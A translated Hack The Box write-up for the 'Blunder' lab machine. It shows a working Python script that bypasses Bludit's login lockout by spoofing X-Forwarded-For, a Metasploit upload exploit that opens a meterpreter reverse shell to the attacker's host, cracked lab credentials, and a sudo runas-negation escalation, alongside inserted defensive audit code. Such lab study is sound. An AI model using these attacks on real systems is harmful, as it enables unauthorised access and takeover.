HTB box: Blunder


    This article is for technical exchange, learning and research only. Using the techniques in it for illegal purposes or to cause damage is strictly prohibited; the author of this article bears no responsibility for any consequences.

    The box is a retired machine run under the author's VIP subscription; its IP address is 10.10.10.191.

    This time https://github.com/Tib3rius/AutoRecon is used for an automated all-round scan.

    Information gathering and enumeration
    https://github.com/codingo/Reconnoitre is similar to autorecon
    autorecon 10.10.10.191 -o ./Blunder-autorecon

    masscan -p1-65535 10.10.10.191 --rate=1000 -e tun0 > ports
    ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
    nmap -Pn -sV -sC -p$ports 10.10.10.191

    The scan shows only port 80 open, so browse to it.

    Nothing of obvious value on the page; look at the page source.

    The site is confirmed to run the Bludit CMS, version 3.9.2. A web search turns up a brute-force mitigation bypass vulnerability; details: https://rastating.github.io/bludit-brute-force-mitigation-bypass/

    Start collecting all keywords from the target site as a password wordlist, using cewl (https://github.com/digininja/CeWL):

    cewl 10.10.10.191 > wordlist.txt

    While that collects, brute-force the site's directories; the rustbuster binary is used for this.

    A newer directory brute-forcing tool
    https://github.com/phra/rustbuster

    Download the binary
    wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster

    Probe directories
    ./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15

    Results:

    kali@kali:~/Downloads/htb/blunder$ ./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15
    ~ rustbuster v3.0.3 ~ by phra & ps1dr3x ~
    
    [?] Started at  : 2021-05-08 10:55:03
    
    GET     403 Forbidden                   http://10.10.10.191/.hta
    GET     403 Forbidden                   http://10.10.10.191/.hta.php
    GET     403 Forbidden                   http://10.10.10.191/.hta.txt
    GET     403 Forbidden                   http://10.10.10.191/.hta.pdf
    GET     403 Forbidden                   http://10.10.10.191/.htaccess
    GET     403 Forbidden                   http://10.10.10.191/.htpasswd
    GET     403 Forbidden                   http://10.10.10.191/.htpasswd.php
    GET     403 Forbidden                   http://10.10.10.191/.htaccess.php
    GET     403 Forbidden                   http://10.10.10.191/.htpasswd.pdf
    GET     403 Forbidden                   http://10.10.10.191/.htaccess.txt
    GET     403 Forbidden                   http://10.10.10.191/.htaccess.pdf
    GET     403 Forbidden                   http://10.10.10.191/.htpasswd.txt
    GET     200 OK                          http://10.10.10.191/0
    GET     200 OK                          http://10.10.10.191/LICENSE
    GET     200 OK                          http://10.10.10.191/about
    GET     301 Moved Permanently           http://10.10.10.191/admin
                                                    => http://10.10.10.191/admin/
    GET     301 Moved Permanently           http://10.10.10.191/cgi-bin/
                                                    => http://10.10.10.191/cgi-bin
    GET     200 OK                          http://10.10.10.191/install.php
    GET     200 OK                          http://10.10.10.191/robots.txt
    GET     200 OK                          http://10.10.10.191/robots.txt
    GET     403 Forbidden                   http://10.10.10.191/server-status
    GET     200 OK                          http://10.10.10.191/todo.txt
      [00:09:19] ########################################   18620/18620   ETA: 00:00:00 req/s: 33
    
    [?] Ended at: 2021-05-08 11:04:22

    Visiting each of them, todo.txt gives some information.

    It hints that a user fergus is about to be given access to post on the new blog, and a login form was already found above.

    Following the exploit found above, test the brute-force mitigation bypass directly to obtain the account's password. The final password brute-force program, the Python 2 version, is as follows:

    #!/usr/bin/env python3
    import re
    import requests

    host = 'http://10.10.10.191'
    login_url = host + '/admin/login'
    username = 'fergus'

    # Load the candidate passwords (one per line) from the cewl wordlist
    wordlist = []
    with open('wordlist.txt', 'r') as words:
        for line in words:
            wordlist.append(line.rstrip())

    for password in wordlist:
        # Fresh session per attempt: fetch the login page and pull the CSRF token out of it
        session = requests.Session()
        login_page = session.get(login_url)
        csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
        print('[*] Trying: {p}'.format(p = password))

        # Bludit keys its failed-login counter on X-Forwarded-For, so sending a different
        # value with every request keeps the counter from ever reaching the lockout threshold
        headers = {
            'X-Forwarded-For': password,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.3865.90 Safari/537.36',
            'Referer': login_url
        }

        data = {
            'tokenCSRF': csrf_token,
            'username': username,
            'password': password,
            'save': ''
        }

        login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

        # A successful login answers with a redirect to the admin dashboard
        if 'location' in login_result.headers:
            if '/admin/dashboard' in login_result.headers['location']:
                print()
                print('SUCCESS: Password found!')
                print('Use {u}:{p} to login.'.format(u = username, p = password))
                print()
                break
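The following is an added example, not code from this post or from Bludit: a minimal login guard whose failed-attempt counter is keyed on X-Forwarded-For (the weakness the script above relies on), beside a hardened guard keyed on the socket peer address, both replayed against the same loop of guesses. The lockout threshold, the credential store, the password and the addresses are constructed for the demonstration.

```python
import hashlib
import hmac
from collections import defaultdict

MAX_FAILURES = 10  # constructed lockout threshold

# Constructed credential store; a real one would hold a slow KDF output, not a bare hash
USERS = {"fergus": hashlib.sha256(b"correct-horse").hexdigest()}


def check_password(username, password):
    expected = USERS.get(username)
    if expected is None:
        return False
    return hmac.compare_digest(expected, hashlib.sha256(password.encode()).hexdigest())


class LoginGuard:
    """Counts failed logins per client key and refuses further attempts at MAX_FAILURES."""

    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(int)

    def attempt(self, request, username, password):
        key = self.key_func(request)
        if self.failures[key] >= MAX_FAILURES:
            return "locked"
        if check_password(username, password):
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "denied"


def vulnerable_key(request):
    # Weak: the counter is keyed on a header the client writes, so every new header
    # value looks like a new client with a fresh counter
    return request["headers"].get("X-Forwarded-For") or request["remote_addr"]


def hardened_key(request):
    # Fixed: the peer address comes from the TCP connection and cannot be set by the client.
    # (Behind a trusted reverse proxy, take the proxy-added header only when remote_addr is
    # that proxy; that case is left out here.)
    return request["remote_addr"]


def run_attempts(guard, candidates, username="fergus"):
    """Replay the loop above: one source address, a different X-Forwarded-For per candidate."""
    outcomes = []
    for password in candidates:
        request = {"remote_addr": "10.10.14.2", "headers": {"X-Forwarded-For": password}}
        outcomes.append(guard.attempt(request, username, password))
    return outcomes


def simulate(key_func):
    """30 wrong guesses followed by the right password, all from one source address."""
    candidates = ["guess%d" % i for i in range(30)] + ["correct-horse"]
    return run_attempts(LoginGuard(key_func), candidates)


if __name__ == "__main__":
    print("vulnerable guard, final attempt:", simulate(vulnerable_key)[-1])  # ok: bypassed
    print("hardened guard, final attempt:  ", simulate(hardened_key)[-1])    # locked
```

With the hardened key the eleventh attempt from the same address is already refused, so the correct password at the end of the list never gets checked; with the header-based key every guess starts a fresh counter and the last one succeeds. In detection terms, many login POSTs from one peer address carrying a different X-Forwarded-For on each request is itself a usable signature of this bypass.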

    Account and password obtained:

    fergus:RolandDeschain

    After logging in, some time was spent on verification; it was finally confirmed that a file upload combined with directory traversal gives remote code execution. Details: https://github.com/bludit/bludit/issues/1081
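As an added example (generic illustration, not Bludit's code and not part of this post), here is the upload pattern that makes the issue above possible next to a hardened validator. The weak version trusts the client-declared content type and joins a client-supplied directory identifier straight into the path; the hardened one allow-lists the identifier and the filename, checks the file signature against the extension, and confirms the resolved path stays under the upload root. The upload root, the sample uploads and the identifiers are constructed.

```python
import os
import re

UPLOAD_ROOT = "/var/www/site/bl-content/uploads"  # assumed layout, not Bludit's real path
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Leading bytes of the accepted image formats (well-known file signatures)
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.[a-z]{3,4}$")
SAFE_UUID = re.compile(r"^[A-Za-z0-9]{8,64}$")


def escapes_root(path):
    """True if the normalised path lies outside UPLOAD_ROOT."""
    resolved = os.path.normpath(path)
    return os.path.commonpath([UPLOAD_ROOT, resolved]) != UPLOAD_ROOT


def vulnerable_destination(uuid, filename, declared_type):
    # Weak pattern: trusts the client's Content-Type and joins the client-supplied uuid
    # straight into the path, so "../" in uuid relocates the file and a companion
    # .htaccess is just another upload
    if not declared_type.startswith("image/"):
        raise ValueError("not an image")
    return os.path.join(UPLOAD_ROOT, "pages", uuid, filename)


def hardened_destination(uuid, filename, data):
    if not SAFE_UUID.match(uuid):                 # uuid is an identifier, never a path
        raise ValueError("bad uuid")
    if not SAFE_NAME.match(filename):             # no dotfiles, no separators, plain name
        raise ValueError("bad filename")
    ext = filename.rsplit(".", 1)[1]
    if ext not in ALLOWED_EXT:                    # allow-list, not a deny-list
        raise ValueError("extension not allowed")
    if not data.startswith(MAGIC[ext]):           # content must match what the name claims
        raise ValueError("content does not match extension")
    dest = os.path.join(UPLOAD_ROOT, "pages", uuid, filename)
    if escapes_root(dest):                        # defence in depth after the checks above
        raise ValueError("path escapes upload root")
    return os.path.normpath(dest)


# Constructed uploads: a real PNG header, PHP text in a .png, a dotfile, and a traversal uuid
SAMPLE_UPLOADS = [
    ("3b7ad2e1c0f94d6a", "photo.png", MAGIC["png"] + b"\x00" * 16),
    ("3b7ad2e1c0f94d6a", "shell.png", b"<?php echo 1; ?>"),
    ("3b7ad2e1c0f94d6a", ".htaccess", b"# constructed"),
    ("../../tmp", "photo.png", MAGIC["png"]),
]


def audit(uploads):
    """Run each upload through the hardened rules and report the decision in order."""
    results = []
    for uuid, filename, data in uploads:
        try:
            hardened_destination(uuid, filename, data)
            results.append("accepted")
        except ValueError as err:
            results.append("rejected: %s" % err)
    return results


if __name__ == "__main__":
    for (uuid, name, _), verdict in zip(SAMPLE_UPLOADS, audit(SAMPLE_UPLOADS)):
        print("%-18s %-12s %s" % (uuid, name, verdict))
```

The signature check alone would not stop a file that is a valid image with PHP appended, which is why the .htaccess rejection and the fixed upload directory matter as much: without a server-side rewrite and without the file landing somewhere unexpected, an image stays an image.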

    For convenience I use Metasploit to exploit it directly.

    msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.2
    lhost => 10.10.14.2
    msf5 exploit(linux/http/bludit_upload_images_exec) > set lport 8833
    lport => 8833
    msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
    bludituser => fergus
    msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
    bluditpass => RolandDeschain
    msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
    
    [-] Exploit failed: One or more options failed to validate: RHOSTS.
    [*] Exploit completed, but no session was created.
    msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
    rhosts => 10.10.10.191
    msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
    
    [*] Started reverse TCP handler on 10.10.14.2:8833
    [+] Logged in as: fergus
    [*] Retrieving UUID...
    [*] Uploading aanOwmocKW.png...
    [*] Uploading .htaccess...
    [*] Executing aanOwmocKW.png...
    [*] Sending stage (38288 bytes) to 10.10.10.191
    [*] Meterpreter session 1 opened (10.10.14.2:8833 -> 10.10.10.191:50620) at 2021-05-08 14:16:30 +0800
    [+] Deleted .htaccess
    
    
    meterpreter >

    Browsing the web root shows that, besides version 3.9.2, there is also a 3.10.0a version.

    www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
    cat users.php
    <?php defined('BLUDIT') or die('Bludit CMS.'); ?>
    {
        "admin": {
            "nickname": "Hugo",
            "firstName": "Hugo",
            "lastName": "",
            "role": "User",
            "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
            "email": "",
            "registered": "2019-11-27 07:40:55",
            "tokenRemember": "",
            "tokenAuth": "b380cb62057e9da47afce66b4615107d",
            "tokenAuthTTL": "2009-03-15 14:00",
            "twitter": "",
            "facebook": "",
            "instagram": "",
            "codepen": "",
            "linkedin": "",
            "github": "",
            "gitlab": ""}
    }
    www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

    Crack the password hash with somd5.
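The reason an online cracker can turn that users.php entry into a password is the storage format itself: a bare 40-hex digest with no salt and no work factor. As an added example (not code from this post or from Bludit), the block below parses the users.php layout shown above (PHP guard line followed by JSON), classifies each account's stored credential, shows how little a wordlist lookup against such a digest costs, and contrasts it with salted scrypt storage. The sample users.php, its passwords and the digests are constructed, not the box's real data.

```python
import hashlib
import hmac
import json
import os
import re

# Constructed users.php in the layout shown above (PHP guard line, then JSON). The digests
# are SHA-1 of constructed passwords, not the hash from the box.
SAMPLE_USERS_PHP = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps({
    "admin": {"nickname": "Hugo", "role": "User",
              "password": hashlib.sha1(b"example-pass").hexdigest()},
    "fergus": {"nickname": "fergus", "role": "Author",
               "password": hashlib.sha1(b"another-pass").hexdigest()},
}, indent=4)

HEX40 = re.compile(r"^[0-9a-f]{40}$")
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def parse_users_php(text):
    """Drop the PHP guard line and return the user table as a dict."""
    body = re.sub(r"^<\?php.*?\?>\s*", "", text, count=1, flags=re.DOTALL)
    return json.loads(body)


def audit_password_storage(users):
    """Classify each account's stored credential by format."""
    findings = {}
    for name, record in users.items():
        stored = record.get("password", "")
        if HEX40.match(stored):
            findings[name] = "unsalted 40-hex digest (SHA-1 length): crackable offline from a wordlist"
        elif stored.startswith("$scrypt$"):
            findings[name] = "ok"
        else:
            findings[name] = "unrecognised format"
    return findings


def wordlist_hits(users, wordlist):
    """Accounts whose bare SHA-1 digest equals the digest of a wordlist entry (one hash per word)."""
    table = {hashlib.sha1(word.encode()).hexdigest(): word for word in wordlist}
    hits = {}
    for name, record in users.items():
        word = table.get(record.get("password", ""))
        if word is not None:
            hits[name] = word
    return hits


def hash_password(password, salt=None):
    """Hardened storage: per-user random salt plus a memory-hard KDF in a self-describing string."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "$scrypt$%s$%s" % (salt.hex(), digest.hex())


def verify_password(password, stored):
    try:
        _, scheme, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    users = parse_users_php(SAMPLE_USERS_PHP)
    for name, verdict in audit_password_storage(users).items():
        print(name, "->", verdict)
    print("wordlist hits:", wordlist_hits(users, ["password", "example-pass"]))
```

A precomputed table of digests for a large wordlist answers an unsalted lookup instantly, which is exactly the service the online cracker provides; a per-user salt defeats the shared table and the scrypt cost makes each remaining guess expensive.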

    Switch to user hugo directly with su.

    Run sudo -l

    It shows

    (ALL, !root) /bin/bash

    Search for that in Google:

    https://www.exploit-db.com/exploits/47502

    That gives the privilege-escalation vulnerability above; check the sudo version on the box.

    It falls right inside the vulnerable version range, so exploit it directly to escalate.
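From the defender's side, the two things the last steps checked (a runas list of the form "(ALL, !root)" and the installed sudo version) are exactly what an audit should look for. As an added example (not code from this post or from the sudo project), the block below parses constructed `sudo -l` and `sudo --version` output, extracts runas rules, and flags any rule that grants ALL with a "!" exclusion. The fixed sudo release is given as 1.8.28 on the author's own knowledge of the upstream advisory, so treat that constant as an assumption to confirm against the exploit-db entry linked above; the hostname, user and version banner in the samples are constructed.

```python
import re

# Constructed samples in the formats `sudo -l` and `sudo --version` print
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
SAMPLE_VERSION = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"

# Assumed fixed release for the runas-negation bypass; confirm against the advisory
FIXED_VERSION = (1, 8, 28)

RUNAS_RULE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")


def parse_runas_rules(sudo_l_output):
    """Return (runas_users, command) pairs from `sudo -l` output."""
    rules = []
    for line in sudo_l_output.splitlines():
        match = RUNAS_RULE.match(line)
        if match:
            # "(users : groups)" form: only the user part matters for this check
            user_part = match.group(1).split(":")[0]
            runas = [entry.strip() for entry in user_part.split(",")]
            rules.append((runas, match.group(2).strip()))
    return rules


def parse_version(banner):
    """Major/minor/patch from a `sudo --version` banner; suffixes like p1 are ignored."""
    match = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if not match:
        raise ValueError("no sudo version found")
    return tuple(int(part) for part in match.groups())


def negated_runas_findings(rules, version):
    """Flag rules that grant ALL runas users with a '!' exclusion."""
    findings = []
    for runas, command in rules:
        excluded = [entry[1:] for entry in runas if entry.startswith("!")]
        if "ALL" in runas and excluded:
            if version < FIXED_VERSION:
                status = "vulnerable: sudo older than %d.%d.%d" % FIXED_VERSION
            else:
                # Exclusion lists remain a weak way to express intent even on patched sudo;
                # listing the permitted target users explicitly is the robust form
                status = "weak: negation in runas list on patched sudo"
            findings.append({"command": command, "excluded": excluded, "status": status})
    return findings


def audit(sudo_l_output, version_banner):
    return negated_runas_findings(parse_runas_rules(sudo_l_output), parse_version(version_banner))


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L, SAMPLE_VERSION):
        print(finding)
```

The remediation is the same whichever status the audit reports: replace "(ALL, !root)" with the explicit list of target users the rule is meant to allow, and bring sudo up to a patched release.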

    A confused life needs constant effort before the blurred aspirations in the distance come into view!
    Original URL: https://www.cnblogs.com/autopwn/p/14744949.html